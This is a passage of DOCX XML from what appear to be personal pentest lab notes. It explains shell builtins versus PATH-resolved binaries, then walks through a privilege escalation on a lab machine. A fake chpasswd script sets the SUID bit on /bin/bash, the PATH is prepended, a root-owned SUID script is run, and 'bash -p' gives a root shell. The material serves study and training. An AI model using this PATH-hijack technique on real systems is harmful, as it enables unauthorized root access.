        <w:t xml:space="preserve">Shell builtins (not hijackable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo is shell builtin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Things like echo, cd, pwd, test, readonly, shift, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are built into bash (or whatever shell is running). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The shell executes them directly, bypassing $PATH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002648">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even if a file exists in /bin with the same name (/bin/echo), the shell uses its builtin unless explicitly told otherwise (/bin/echo or command echo).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002649">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">External binaries (hijackable if not called with full path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chpasswd is an external binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Things like ls, cp, passwd, chpasswd, id, cat, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These live in /bin, /usr/bin, /sbin, /usr/sbin, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000264F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a script calls them without an absolute path (just chpasswd instead of /usr/sbin/chpasswd), the shell resolves them via $PATH. This is where hijacking works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002650">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002651">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check if a command/binary is built-in or external:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type -a &lt;name&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type &lt;name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002653">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2835714" cy="1176821"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="516" name="image536.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image536.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId803"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2835714" cy="1176821"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002654">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Echo is shell builtin as seen here, so not hijackable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002655">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3652838" cy="740346"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="541" name="image519.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image519.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId804"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3652838" cy="740346"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002656">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="385"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are no mentions of shell builtin so this is hijakable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002657">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fr5vuh9iyaft" w:id="338"/>
      <w:bookmarkEnd w:id="338"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example with custom script (with SUID bit set) calling chpasswd but without full path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002658">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002659">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from XXXXXXXXX-B .149 for priv esc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priv Esc (via PATH hijack and SUID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265C">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When we look at the RESET_PASSWORD script in our home directory, we see this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="72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356100" cy="3238500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="491" name="image470.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image470.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId805"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43561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265E">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From earlier, we know this script changes the password of Kiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000265F">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But here, it uses chpasswd without specifying the full path to the binary. Meaning we can inject our own chpasswd binary and specify it first in the PATH variable and run the script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002660">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And we check if we have SUID set on RESET_PASSWORD which means we can run this script as root since it's owned by root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002661">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So, go to home directory (/home/john)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002662">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102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touch chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002663">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102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nano chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002664">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002665">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002666">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chmod u+s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002667">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/echo Done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002668">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This sets SUID bit to /bin/bash and echoes "Done"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002669">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And then make it executable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102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chmod +x chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266B">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And then change Path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102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export PATH=/home/john:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts /home/john at the start of PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266E">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And then we check to see if it recognize our path first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000266F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="102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which chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002670">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This outputs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/john/chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002671">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And btw, I ran this before without doing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> first and it didn't work. this is because "which" only looks at executable files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002672">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And then now we just run RESET_PASSWORD, which runs it as root cuz of SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002673">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>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./RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002674">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And it should print "done" showing that it worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002675">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And then open /bin/bash now that it has SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002676">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>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-p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002677">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002678">
      <w:pPr>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w:t>
      </w:r>
    </w:p>
